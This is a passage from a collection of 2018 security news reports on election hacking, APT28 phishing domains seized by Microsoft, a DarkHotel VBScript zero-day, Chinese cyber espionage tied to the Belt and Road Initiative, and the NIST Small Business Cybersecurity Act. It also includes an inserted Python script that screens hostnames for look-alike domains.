Marilyn Marks disagrees. “There’s no new voting system needed, and no new equipment,” she told SecurityWeek. “They already use paper ballots (for example, for postal votes). They just need to dispense with the touchscreen machines, put paper votes into ballot boxes to be transported to the election office and use the scanners they already have to scan the votes in quantity. All that is needed is more of the same paper ballots – and the printers still have many weeks to do that.”

Ryan Jones, managing principal at Coalfire Labs, didn’t want to comment on any legal aspects between the Coalition for Good Governance and the secretary of state for Georgia. But he did say, “We have assessed not only voting machines, but also the Voluntary Voting System Guidelines standard – by which most voting machines are gauged – as well as the end-to-end gaps in pre-election, election, and post-election processes. We can say with some assurance,” he confirmed, “that machines in their current state, despite having met the VVSG standard, have many technical aspects that can be compromised by a diligent hacker that looks at the hacking challenge across the entire system and process. We have compromised multiple voting systems in a lab setting in as little as two minutes; and as news reports attest, an 11-year-old also recently hacked a voting environment at a security conference.” [DEF CON’s Vote Hacking Village.]

Last word goes to Professor Rich DeMillo. “Georgia is the largest state that does not use auditable elections equipment; so, if I were in the attackers' shoes and was looking for a return on investment, this is the kind of state that I would look at – a state where the races are likely to be tight and where the chance of me being discovered is going to be slim because by design it is impossible to verify after the election that there was a breach.”

It is now up to the court to decide whether well-documented flaws in the existing electronic voting infrastructure combined with the lack of any auditing capability are sufficiently serious to force a last-minute switch back to paper-based voting in the Georgia state midterm elections in November.

FBI Probes Computer Hacks in California House Campaigns
22.8.18 securityweek BigBrothers

HUNTINGTON BEACH, Calif. (AP) — The FBI launched investigations after two Southern California Democratic U.S. House candidates were targeted by computer hackers, though it's unclear whether politics had anything to do with the attacks.

A law enforcement official told The Associated Press the FBI looked into hacks involving David Min in the 45th Congressional District and Hans Keirstead in the adjacent 48th District. Both districts are in Orange County and are seen as potential pickups as the Democratic Party seeks to win control of the Congress in November.

A person with knowledge of the Min investigation told the AP on Monday that two laptops used by senior staffers for the candidate were found infected with malware in March. It's not clear what, if any, data was stolen, and there is no evidence the breach influenced the contest.

The CEO of a biomedical research company, Keirstead last summer was the victim of a broad "spear-phishing" attack, in which emails that appear to come from a friend or familiar source are designed to help hackers snatch sensitive or confidential information, the law enforcement official said. There is no evidence Keirstead lost valuable information.

The investigations so far have not turned up evidence the two candidates in Orange County were political targets.

The official and the knowledgeable person were not authorized to discuss the cases publicly and spoke only on condition of anonymity.

Keirstead was narrowly defeated in the June primary for the seat held by Republican Rep. Dana Rohrabacher. Min came in third in the contest to unseat Republican Rep. Mimi Walters.

Min's staff was alerted to a potential cyberattack by a facility manager in the software incubator where his campaign rented space. It was later found the computers were infected with software that records and sends keystrokes, with additional software that concealed it from conventional anti-virus tools used by the campaign.

Hackers also used a broad spear-phishing attack in an attempt to gain access, and FBI investigators are still piecing together additional details, the official said.

The two laptops were replaced, and Min's computer was not infected. The attack on the computers was first reported by Reuters.

Keirstead campaign officials detected repeated attempts to access the campaign's website.

Rolling Stone magazine, which first reported that cyberattack, said hackers or bots tried different username-password combinations in a rapid-fire sequence over a two-and-a-half-month period to get inside the campaign's WordPress-hosted website.

According to the campaign, there were also more than 130,000 so-called brute force attempts over a monthlong period to gain access to the campaign's server through the cloud-server company that hosted the Keirstead campaign's website, Rolling Stone said.

Computer security experts say that a high volume of attempts to gain access to a site hosted with the popular and free WordPress software is not unusual.

"Every WordPress hosted website sees 130,000 brute force attempts over a monthlong period, regardless whether it's Bohemian basket weaving, a blog about furry costume construction, or a politician website," said Robert Graham, a cybersecurity expert who created the BlackICE personal firewall.

"Hackers don't know or care who you are: they only care that you use WordPress," Graham said in a text message.

Min finished third behind fellow Democrat Katie Porter, who faces Walters in November. In the 48th District, Rohrabacher will face Democrat Harley Rouda, who snagged the second runoff spot by defeating Keirstead by 125 votes.

Russian Hackers Went After Conservative US Groups: Microsoft
22.8.18 securityweek BigBrothers

The Russian hacking unit that tried to interfere in the US presidential election has been targeting conservative US think tanks, Microsoft said.

Acting on a court order, the company last week seized control of six fake websites involved in such efforts, which also involved a site that mimicked the US Senate, Microsoft president Brad Smith said in a blog post Monday.

The hackers were linked to the Russian military intelligence agency known as the GRU, Smith wrote.

The idea was to have people think they were accessing links managed by these US political groups but redirect them to fake ones run by the hackers so passwords and other information could be stolen.

Smith said one such site appeared to mimic that of the International Republican Institute, which promotes democratic principles and whose board includes Republican senators, among them John McCain, who have been critical of President Vladimir Putin.

Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity.

"We're concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 2018 elections," Smith wrote.

Experts said the aim was to go after anyone who opposes Putin.

"This is another demonstration of the fact that the Russians aren't really pursuing partisan attacks. They are pursuing attacks that they perceive in their own national self-interest," Eric Rosenbach, the director of the Defending Digital Democracy project at Harvard University, told the New York Times.

"It's about disrupting and diminishing any group that challenges how Putin's Russia is operating at home and around the world," Rosenbach added.

The Kremlin dismissed the fresh allegations, with spokesman Dmitry Peskov saying he did not know "which hackers are being talked about, what influencing of elections".

"We do not understand what Russian military intelligence has to do with this. What is the basis of such serious accusations? They should not be raised without some foundation," he told journalists.

Microsoft's Anti-Hacking Efforts Make it an Internet Cop
21.8.18 securityweek BigBrothers

Intentionally or not, Microsoft has emerged as a kind of internet cop by devoting considerable resources to thwarting Russian hackers.

The company's announcement Tuesday that it had identified and forced the removal of fake internet domains mimicking conservative U.S. political institutions triggered alarm on Capitol Hill and led Russian officials to accuse the company of participating in an anti-Russian "witch hunt."

Microsoft stands virtually alone among tech companies with an aggressive approach that uses U.S. courts to fight computer fraud and seize hacked websites back. In the process, it has acted more like a government detective than a global software giant.

In the case this week, the company did not just accidentally stumble onto a couple of harmless spoof websites. It seized the latest beachhead in an ongoing struggle against Russian hackers who meddled in the 2016 presidential election and a broader, decade-long legal fight to protect Microsoft customers from cybercrime.

"What we're seeing in the last couple of months appears to be an uptick in activity," Brad Smith, Microsoft's president and chief legal officer, said in an interview this week. Microsoft says it caught these particular sites early and that there's no evidence they were used in hacking.

The Redmond, Washington, company sued the hacking group best known as Fancy Bear in August 2016, saying it was breaking into Microsoft accounts and computer networks and stealing highly sensitive information from customers. The group, Microsoft said, would send "spear-phishing" emails that linked to realistic-looking fake websites in hopes targeted victims — including political and military figures — would click and betray their credentials.

The effort is not just a question of fighting computer fraud but of protecting trademarks and copyright, the company argues.

One email introduced as court evidence in 2016 showed a photo of a mushroom cloud and a link to an article about how Russia-U.S. tensions could trigger World War III. Clicking on the link might expose a user's computer to infection, hidden spyware or data theft.

An indictment from U.S. special counsel Robert Mueller has tied Fancy Bear to Russia's main intelligence agency, known as the GRU, and to the 2016 email hacking of both the Democratic National Committee and Democrat Hillary Clinton's presidential campaign.

Some security experts were skeptical about the publicity surrounding Microsoft's announcement, worried that it was an overblown reaction to routine surveillance of political organizations — potential cyberespionage honey pots — that never rose to the level of an actual hack.

The company also used its discovery as an opportunity to announce its new free security service to protect U.S. candidates, campaigns and political organizations ahead of the midterm elections.

But Maurice Turner, a senior technologist at the industry-backed Center for Democracy and Technology, said Microsoft is wholly justified in its approach to identifying and publicizing online dangers.

"Microsoft is really setting the standards with how public and how detailed they are with reporting out their actions," Turner said.

Companies including Microsoft, Google and Amazon are uniquely positioned to do this because their infrastructure and customers are affected. Turner said they "are defending their own hardware and their own software and to some extent defending their own customers."

Turner said he has not seen anyone in the industry as "out in front and open about" these issues as Microsoft.

Microsoft's Windows operating systems, as industry leaders, had long been prime targets for viruses when in 2008 the company formed its Digital Crimes Unit, an international team of attorneys, investigators and data scientists. The unit became known earlier in this decade for taking down botnets, collections of compromised computers used as tools for financial crimes and denial-of-service attacks that overwhelm their targets with junk data.

Richard Boscovich, a former federal prosecutor and a senior attorney in Microsoft's digital crimes unit, testified to the Senate in 2014 about how Microsoft used civil litigation as a tactic. Boscovich is also involved in the fight against Fancy Bear, which Microsoft calls Strontium, according to court filings.

To attack botnets, Microsoft would take its fight to courts, suing on the basis of the federal Computer Fraud and Abuse Act and other laws and asking judges for permission to sever the networks' command-and-control structures.

"Once the court grants permission and Microsoft severs the connection between a cybercriminal and an infected computer, traffic generated by infected computers is either disabled or routed to domains controlled by Microsoft," Boscovich said in 2014.

He said the process of taking over the accounts, known as "sinkholing," enabled Microsoft to collect valuable evidence and intelligence used to assist victims.

In the latest action against Fancy Bear, a court order filed Monday allowed Microsoft to seize six new domains, which the company said were either registered or used at some point after April 20.

Smith said this week the company is still investigating how the newly discovered domains might have been used.

A security firm, Trend Micro, identified some of the same fake domains earlier this year. They mimicked U.S. Senate websites, while using standard Microsoft log-in graphics that made them appear legitimate, said Mark Nunnikhoven, Trend Micro's vice president of cloud research.

Microsoft has good reason to take them down, Nunnikhoven said, because they can hurt its brand reputation. But the efforts also fit into a broader tech industry mission to make the internet safer.

"If consumers are not comfortable and don't feel safe using digital products," they will be less likely to use them, Nunnikhoven said.

Microsoft says Russian hackers continue targeting 2018 midterm elections
21.8.18 securityaffairs BigBrothers  APT

Microsoft has spotted a new hacking campaign targeting the 2018 midterm elections; the experts attributed the attacks to the Russia-linked APT28 group.

The tech giant attributed to the Russia-linked APT28 group a series of cyber attacks aimed at members of the United States Senate, conservative organizations and think tanks.

The Russian APT group tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007, operates under the Russian military intelligence agency GRU, and continues to target US politicians.

According to Microsoft, the Russian cyberspies created at least six fake websites related to the US Senate and conservative organizations to infect visitors’ systems.


Three bogus domains were created to appear as legitimate sites belonging to the U.S. Senate, and a fourth, non-political website spoofed Microsoft’s online products.
The remaining websites were designed to mimic two U.S. conservative think tanks:

The Hudson Institute — a conservative Washington think tank.
The International Republican Institute (IRI) — a nonprofit group that promotes democracy worldwide and whose board includes prominent Republican figures like Sen. John McCain.
The fake sites were created over the past several months; the hackers registered them with major web-hosting companies.

Microsoft did not provide further details on the attacks.

“One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices.” reads the post published by Microsoft.
“To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.”
Microsoft’s Digital Crimes Unit shut down the fake websites with court approval received last year and notified the targeted organizations.
At this time it is not possible to say whether attacks using the fake sites allowed the cyberspies to compromise visitors’ machines; Microsoft’s post doesn’t mention any sinkhole investigation conducted by its experts.
Microsoft has shut down dozens of other fake websites since 2016 after obtaining authorization from the authorities.
Experts believe that foreign states, especially Russia, will continue to attempt to hack into US politics, and for this reason Microsoft will continue to monitor any activity targeting US political groups and politicians.
“Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.” continues Microsoft.
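A screening check for look-alike registrations of the kind described above, added here as an example (it is not Microsoft's or the DCU's tooling). It assumes hudson.org, iri.org and senate.gov are the legitimate domains of the organizations named in the article, and every candidate hostname in it is constructed, not one of the seized domains.

```python
"""Screen hostnames for look-alike registrations against a brand watchlist.

Added example; not Microsoft/DCU tooling. The legitimate domains below are
assumed for the organizations named in the article; sample hosts are constructed.
"""
import re
import unicodedata
from dataclasses import dataclass
from typing import Optional

# Assumed legitimate registrable domains -> brand keywords that impersonators
# tend to reuse in labels. Keywords shorter than 5 chars only match a whole label.
WATCHLIST = {
    "hudson.org": ["hudson", "hudsoninstitute"],
    "iri.org": ["iri", "internationalrepublicaninstitute"],
    "senate.gov": ["senate"],
}

# Digit/symbol substitutions commonly used to imitate letters.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "|": "l"})


def normalize(label: str) -> str:
    """Fold a DNS label to a bare lower-case ASCII form for comparison."""
    s = unicodedata.normalize("NFKD", label).encode("ascii", "ignore").decode()
    s = s.lower().translate(HOMOGLYPHS)
    s = s.replace("rn", "m").replace("vv", "w")   # visually confusable pairs
    return re.sub(r"[^a-z0-9]", "", s)


# Keywords are folded with the same function so both sides compare identically.
KEYWORDS = {brand: [normalize(k) for k in kws] for brand, kws in WATCHLIST.items()}


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


@dataclass
class Finding:
    host: str
    brand: str      # watchlist domain being imitated
    reason: str


def _label_matches(label: str, keyword: str) -> Optional[str]:
    if label == keyword:
        return "label equals brand keyword"
    if len(keyword) < 5:          # short keywords would be far too noisy otherwise
        return None
    if keyword in label:
        return "brand keyword embedded in label"
    if levenshtein(label, keyword) <= (1 if len(keyword) < 8 else 2):
        return "edit-distance look-alike of brand keyword"
    return None


def assess(host: str) -> Optional[Finding]:
    """Return a Finding if `host` looks like an imitation of a watchlist domain."""
    host = host.strip().rstrip(".").lower()
    try:                          # decode punycode so IDN homographs compare as letters
        host = host.encode("ascii").decode("idna")
    except UnicodeError:
        pass                      # already Unicode, or not valid punycode
    labels = host.split(".")
    # Simplification: registrable domain = last two labels (no public-suffix list).
    if ".".join(labels[-2:]) in WATCHLIST:
        return None               # the genuine domain or one of its own subdomains
    norm_labels = [normalize(lbl) for lbl in labels]
    for brand, keywords in KEYWORDS.items():
        for label in norm_labels:
            for keyword in keywords:
                reason = _label_matches(label, keyword)
                if reason:
                    return Finding(host, brand, reason)
    return None


if __name__ == "__main__":
    # Constructed sample hostnames, not the domains seized by Microsoft.
    for h in ["hudson.org", "www.iri.org", "hud50n-institute.example",
              "senate-mail-login.example", "iri.mail.example", "hudsön.example",
              "spirit.example"]:
        print(h, "->", assess(h) or "no match")
```

Fed newly registered domains or passive-DNS hits, the findings are a triage queue, not a verdict; the whole-label rule for short keywords and the two-label registrable-domain shortcut are the main sources of misses and false positives.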
In July, speaking at the Aspen Security Forum, Microsoft VP Tom Burt announced that the tech company had uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates.

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,”

The discovery made by Microsoft is part of Microsoft’s Defending Democracy Program, launched in April, which is focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns.

Microsoft also announced its AccountGuard initiative, which provides the following services to organizational and personal email accounts:

Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.

North Korean Hackers Exploit Recently Patched Zero-Day
21.8.18 securityweek  BigBrothers  

North Korean hackers are exploiting a recently patched vulnerability in Microsoft's VBScript engine in live attacks, security researchers say.

Tracked as CVE-2018-8373, the bug was identified as a memory corruption issue that would result in remote code execution in the context of the current user. The flaw resides in the manner in which the VBScript scripting engine handles objects in memory in Internet Explorer.

“[A]n attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine,” Microsoft said.

Impacting the VBScript engine in the latest versions of Windows, the vulnerability does not affect Internet Explorer 11, as “VBScript in Windows 10 Redstone 3 (RS3) has been effectively disabled by default,” Trend Micro, the security firm that discovered the flaw last month, says.

The security company also notes that the discovered exploit sample uses the same obfuscation technique as exploits for CVE-2018-8174, a VBScript engine remote code execution flaw that Microsoft addressed in May.

The method for exploiting CVE-2018-8373 and running shellcode is also similar to the CVE-2018-8174 exploits, which further suggests that the same author is behind both. The creator used a new use-after-free (UAF) vulnerability in vbscript.dll, which remained unpatched in the latest VBScript engine, Trend Micro says.

Last week, Dustin Childs, communications manager for the ZDI, told SecurityWeek that the similarities between these flaws seem more than coincidental. He also pointed out that further exploits could emerge from the same group.

While Trend Micro did not attribute the attacks to a specific actor, Qihoo 360’s security researchers claim that the North Korean threat actor known as DarkHotel is behind both exploits.

The researchers say the domain name used by the zero-day exploit is the same they observed in May being used for CVE-2018-8174’s exploitation and that it is indeed linked to DarkHotel.

Qihoo 360, which has been tracking DarkHotel for a while, appears confident that this is the threat actor that has been exploiting CVE-2018-8373 since before it was patched.

“Based on our analysis, this vulnerability can be steadily exploited. Moreover, since it is the second VB engine exploit found in the wild this year, it is not far-fetched to expect other vulnerability findings in the VB engine in the future,” Trend Micro said.

First detailed in 2014, the DarkHotel advanced persistent threat (APT) actor was recently said to be connected to the infamous Lazarus Group. Based on the reuse of code between various malware families attributed to North Korean actors, Intezer and McAfee concluded that most of the malicious tools link back to Lazarus.

China Believes Its Cyber Capabilities Lag Behind US: Pentagon
21.8.18 securityweek BigBrothers

China believes its cyberwarfare capabilities lag behind the United States, but it’s working on closing the gap, according to the U.S. Department of Defense (DOD).

In its annual report to Congress, the Pentagon describes the cyber capabilities and cyber operations of the People's Liberation Army (PLA), and warns that China continues to launch cyberattacks against organizations around the world, including in the United States.

The PLA sees cyberspace as one of the four critical security domains and it has taken steps to make improvements in this area, the report says.

“China believes its cyber capabilities and personnel lag behind the United States and is working to improve training and bolster domestic innovation to overcome these perceived deficiencies and advance cyberspace operations,” the Pentagon noted.

One of the steps taken by the PLA in an effort to improve its cyber capabilities is the creation of the Strategic Support Force (SSF). Believed to have been established in 2015, the SSF’s role is to centralize the military’s space, cyber and electronic warfare missions.

“The establishment of the SSF may represent the first step in developing a cyber force that creates efficiencies by combining cyber reconnaissance, attack, and defense capabilities into one organization,” the report reads. “PLA writings acknowledge the benefits of unifying leadership, centralizing cyber resource management, and combining offensive and defensive cyber capabilities in one military organization, and cite U.S. Cyber Command as accomplishing such a consolidation.”

According to the Pentagon, the Chinese military distinguishes between wartime and peacetime cyber operations. The former focuses on helping the PLA understand its enemy’s trend, plan combat operations, and “ensure victory on the battlefield.” During peacetime, the focus is on defending cyberspace and electromagnetic space.

“[PLA writings] suggest that China is prepared to use cyber operations to manage the escalation of a conflict, as they view cyber operations as a low-cost deterrent and can demonstrate capabilities and resolve to an adversary,” the DoD says.

The Chinese military’s cyber warfare strategy involves targeting an adversary’s command and control (C&C) and logistics networks in an effort to disrupt its ability to operate. The PLA noted that attacking C&C systems has the potential to paralyze the enemy and gain superiority on the battlefield.

“Accordingly, the PLA may seek to use its cyberwarfare capabilities to collect data for intelligence and cyber attack purposes; to constrain an adversary’s actions by targeting network-based logistics, communications, and commercial activities; or to serve as a force-multiplier when coupled with kinetic attacks during times of crisis or conflict,” the report says.

Threat actors based in China continued to target computers around the world through 2017, including systems belonging to the DOD and other U.S. government agencies, with a focus on accessing networks and extracting information.

“China can use the information to benefit China’s defense high-technology industries, support China’s military modernization, provide the [Chinese Communist Party] insights into U.S. leadership perspectives, and enable diplomatic negotiations, such as those supporting China’s Belt and Road Initiative,” the DOD says in its report. “Additionally, targeted information could enable PLA cyber forces to build an operational picture of U.S. defense networks, military disposition, logistics, and related military capabilities that could be exploited prior to or during a crisis. The accesses and skills required for these intrusions are similar to those necessary to conduct cyber operations in an attempt to deter, delay, disrupt, and degrade DoD operations prior to or during a conflict.”

China’s Belt and Road project (BRI) is a driver of regional cyber threat activity
20.8.18 securityaffairs BigBrothers

Security experts have observed increasing cyber espionage activity related to China’s Belt and Road Initiative (BRI).
The alarm was raised by experts from the cybersecurity firms FireEye and Recorded Future.

China’s Belt and Road Initiative (BRI) is a development project for the building of an infrastructure connecting countries in Southeast Asia, Central Asia, the Middle East, Europe, and Africa.

For this reason, the project is considered strategic for almost any intelligence agency.

FireEye defined it as a “driver of regional cyber threat activity”; experts warn of a spike in espionage operations aimed at gathering information on the project.

Cyber spies are already targeting organizations from various sectors that are involved in the project.

“Cyber espionage activity related to the initiative will likely include the emergence of new groups and nation-state actors. Given the range of geopolitical interests affected by this endeavor, it may be a driver of emerging nation-state cyber actors to use their capabilities,” reads a report published by FireEye.

FireEye uncovered an espionage campaign carried out by the China-linked APT group dubbed Roaming Tiger.

The Roaming Tiger campaign was discovered by experts at ESET in 2014; in December 2015, experts uncovered a cyber espionage campaign aimed at Russian organizations.

The APT group targeted entities in Belarus using specially crafted documents that referenced the Chinese infrastructure project as a bait.

FireEye observed the use of several malicious codes against organizations involved in the BRI project.

Chinese hackers used the TOYSNAKE backdoor to target several European foreign ministries. According to FireEye, another malware tracked as BANECHANT was used to target the Maldives, a strategic center for financial investments related to BRI, while the LITRECOLA malware was used in attacks against Cambodia and the SAFERSING malware was involved in campaigns against international NGOs.

Experts also mentioned the recent attacks powered by the TEMP.Periscope group on the maritime industry.

“We expect BRI will also highlight the capabilities of emerging cyber actors across Asia and the Middle East and under what norms such nation-states sponsors will employ their capabilities,” FireEye said in its report. “Prior FireEye iSIGHT Intelligence reporting has noted that rising regional cyber actors, such as Vietnam, have been willing to employ their espionage capabilities against foreign corporations conducting business inside their borders. Similarly, there may be a willingness for other nation-state actors to aggressively target private sector organizations contributing to BRI.”

Researchers at Recorded Future also reported several attacks originating from China, specifically from Tsinghua University.

The hackers targeted the Tibetan community and many government and private sector organizations worldwide.

The attacks launched from Tsinghua University targeted Mongolia, Kenya, and Brazil, which “are key investment destinations as part of China’s Belt and Road Initiative.”

“During the course of our research, we also observed the Tsinghua IP scan ports and probe government departments and commercial entities networks in Mongolia, Kenya, and Brazil. Each of these countries are key investment destinations as part of China’s Belt and Road Initiative.” states the report published by Recorded Future.

“We assess with medium confidence that the consistent reconnaissance activity observed from the Tsinghua IP probing networks in Kenya, Brazil, and Mongolia aligns closely with the BRI economic development goals, demonstrating that the threat actor using this IP is engaged in cyberespionage on behalf of the Chinese state,”


The appendix in the PDF report published by Recorded Future includes a full list of the associated indicators of compromise.

China's 'Belt and Road Initiative' Drives Cyber Spying
17.8.18 securityweek BigBrothers

Cybersecurity firms have observed increasing cyber espionage activity related to China’s Belt and Road Initiative, and researchers expect to see more of these operations in the upcoming period.

China’s Belt and Road Initiative (BRI) is a trillion-dollar development project focused on building infrastructure connecting roughly 70 countries across Asia, Europe and Africa.

Intelligence-focused cybersecurity firms Recorded Future and FireEye this week warned of attacks apparently coming from China and related to the BRI.

FireEye believes that the project will be a “driver of regional cyber threat activity”. Based on historic activity, the company expects threat actors to target organizations in the government, academic, energy, transportation, construction, manufacturing, mining and financial sectors.

FireEye says it has already seen evidence of an increase in cyber espionage operations related to the BRI.

“Cyber espionage activity related to the initiative will likely include the emergence of new groups and nation-state actors. Given the range of geopolitical interests affected by this endeavor, it may be a driver of emerging nation-state cyber actors to use their capabilities,” FireEye said in a report provided to customers and shared with SecurityWeek.

One of the campaigns spotted by FireEye that may be related to the BRI was conducted by a China-linked threat group dubbed Roaming Tiger, which has been known to target high profile organizations in Russia and former Soviet Union countries. Some recent Roaming Tiger attacks aimed at Belarus attempted to deliver malware using specially crafted documents that referenced the Chinese infrastructure project. Belarus is one of the countries targeted by the Belt and Road Initiative.

Other China-linked campaigns observed by FireEye that appear related to the BRI involved the TOYSNAKE backdoor targeting multiple European foreign ministries; the BANECHANT malware targeting Maldives, which has been a focal point of development and financial investments related to BRI; the LITRECOLA malware targeting Cambodia, which is a vital node in the Belt and Road network; the SAFERSING malware targeting international NGOs; and the TEMP.Periscope group targeting the maritime industry.

“We expect BRI will also highlight the capabilities of emerging cyber actors across Asia and the Middle East and under what norms such nation-states sponsors will employ their capabilities,” FireEye said in its report. “Prior FireEye iSIGHT Intelligence reporting has noted that rising regional cyber actors, such as Vietnam, have been willing to employ their espionage capabilities against foreign corporations conducting business inside their borders. Similarly, there may be a willingness for other nation-state actors to aggressively target private sector organizations contributing to BRI.”

A report published on Thursday by Recorded Future details several attack campaigns apparently originating from the Tsinghua University, an elite Chinese academic institution.

The attacks have been aimed at the Tibetan community and various government and private sector organizations around the world.

Researchers noted that some of the countries targeted in attacks originating from this university, specifically Mongolia, Kenya, and Brazil, “are key investment destinations as part of China’s Belt and Road Initiative.”

“We assess with medium confidence that the consistent reconnaissance activity observed from the Tsinghua IP probing networks in Kenya, Brazil, and Mongolia aligns closely with the BRI economic development goals, demonstrating that the threat actor using this IP is engaged in cyberespionage on behalf of the Chinese state,” Recorded Future said in its report.

U.S. and Chile Agree to Cooperate on Cyber Security
17.8.18 securityweek BigBrothers

SANTIAGO, Chile (AP) — U.S. Defense Secretary Jim Mattis and his Chilean counterpart have signed an agreement pledging closer cooperation in combating cyber threats.

Mattis and Defense Minister Alberto Espina held a signing ceremony Thursday after meeting to discuss a range of security issues, including military exercises and cooperation in science and technology. Cyber defense is a topic of growing interest throughout the Western Hemisphere. Banco de Chile, one of the country's biggest commercial banks, has said a hacking operation robbed it of $10 million in June.

Santiago was the fourth stop for Mattis on a tour of South America that began in Brasilia on Sunday. He also visited Rio de Janeiro and Buenos Aires and is scheduled to hold talks in Bogota, Colombia, on Friday.

NIST Small Business Cybersecurity Act Becomes Law
16.8.18 securityweek BigBrothers

The NIST Small Business Cybersecurity Act Aims to Provide Cyberdefense Resources

U.S. President Donald Trump signed the NIST Small Business Cybersecurity Act, S. 770 (formerly known as the MAIN STREET Cybersecurity Act) into law on Tuesday (August 14, 2018). It requires NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

The resources to be provided are informational. They must be generally applicable to a wide range of small businesses; vary with the nature and size of small businesses; promote cybersecurity awareness and workplace cybersecurity culture; and include practical application strategies. The resources must further be technology-neutral and compatible with COTS solutions; and as far as possible consistent with international standards and the Stevenson-Wydler Technology Innovation Act of 1980.

Use of these resources by small businesses is voluntary.

The bi-partisan act was authored by U.S. Senators Brian Schatz (D-Hawai'i) and James Risch (R-Idaho), and co-sponsored by Senators John Thune (R-S.D.), Maria Cantwell (D-Wash.), Bill Nelson (D-Fla.), Cory Gardner (R-Colo.), Catherine Cortez Masto (D-Nev.), Maggie Hassan (D-N.H.), Claire McCaskill (D-Mo.), and Kirsten Gillibrand (D-N.Y.).

"As businesses rely more and more on the internet to run efficiently and reach more customers, they will continue to be vulnerable to cyberattacks. But while big businesses have the resources to protect themselves, small businesses do not, and that's exactly what makes them an easy target for hackers," said Schatz, lead Democrat on the Commerce Subcommittee on Communications Technology, Innovation, and the Internet, in a statement. "This new law will give small businesses the tools to firm up their cybersecurity infrastructure and fight online attacks."

The act has been well-received by the security industry.

"Bills focusing on the cybersecurity needs of small businesses are becoming increasingly necessary to protect activity crucial to the U.S. economy," explains Jessica Ortega, a member of the SiteLock research team. "Small businesses account for 99.7% [SBA figures] of employers in the United States and as many as 50% [CNBC figures] of those have experienced a cyberattack. Not surprising when you consider that websites are attacked as many as 50 times per day on average [Sitelock's own figures]."

She adds, "The NIST Small Business Cybersecurity Act aims to provide cyberdefense resources for small businesses by creating a set of guidelines for basic security measures that should be easy to follow and implement affordably. It also creates guidelines for making security best practices a required component of corporate training and workplace culture, something that is very needed as cyberthreats continue to evolve."

Small businesses, and many large organizations, struggle to comply with the existing NIST Security Framework. "This change sets the stage for greater compliance and readiness from smaller organizations who previously thought that NIST compliance was too costly or complex to obtain," adds Dr. Bret Fund, founder and CEO at SecureSet.

The basic problem is that small organizations cannot afford extensive cybersecurity resources in-house, while many still believe they will not be a target for cyber attackers. "Small businesses are not immune to threats, and are often not equipped with the IT resources or personnel to protect their networks," warns Dirk Morris, chief product officer at Untangle. Small businesses are a major direct target for business email compromise (BEC) and ransomware attacks (https://www.securityweek.com/ransomware-where-its-been-and-where-its-going); and as part of the supply chain for larger organizations they are targeted for both credential theft and island-hopping to the larger target.

Counterintuitively, small businesses suffer more from a successful attack than do the larger companies. "In fact," suggests Anupam Sahai, Vice President of Product Management at Cavirin, "recent reports show that smaller businesses lose proportionately more to cyberattacks since they are targeted just as often, and are less able to recover due to less resilient infrastructures."

The same report highlighted by Sahai also points out that smaller companies paying lower salaries have a proportionately higher number of grey hats working for them, making them more susceptible to insider threats.

While the security industry generally applauds this new act, it still suffers from one major drawback -- use of the new NIST resources by small businesses is voluntary.

"I will be curious to see how this plan is carried out," says Francis Dinha, CEO and co-founder of OpenVPN. "Many small businesses neglect cyber security because they aren't aware and don't understand the risks -- so, they don't seek out solutions. But if they're not seeking out solutions now, what makes anyone think they will seek out these new NIST resources?"

The act, he says, "does not seem to specify how to connect or engage with small businesses in these practices. It only requires NIST to make resources, in the form of guidelines, methodologies, and other information, available online. I'm concerned this won't be enough. If small businesses aren't engaged in a more active way, they may miss this opportunity and remain at risk."

A complaint often heard at SecurityWeek from harassed CISOs is, "If it's not a regulation, it won't happen." Perhaps what is required as a next step is a small business cybersecurity framework that can be audited. Larger organizations can then insist that smaller companies they engage must show compliance to the NIST small business cybersecurity framework -- but even that will create problems. Small companies with great new ideas will continue to develop their idea without intrinsic security -- and the larger companies will have to choose between a great new non-conformant idea and an older conformant solution.

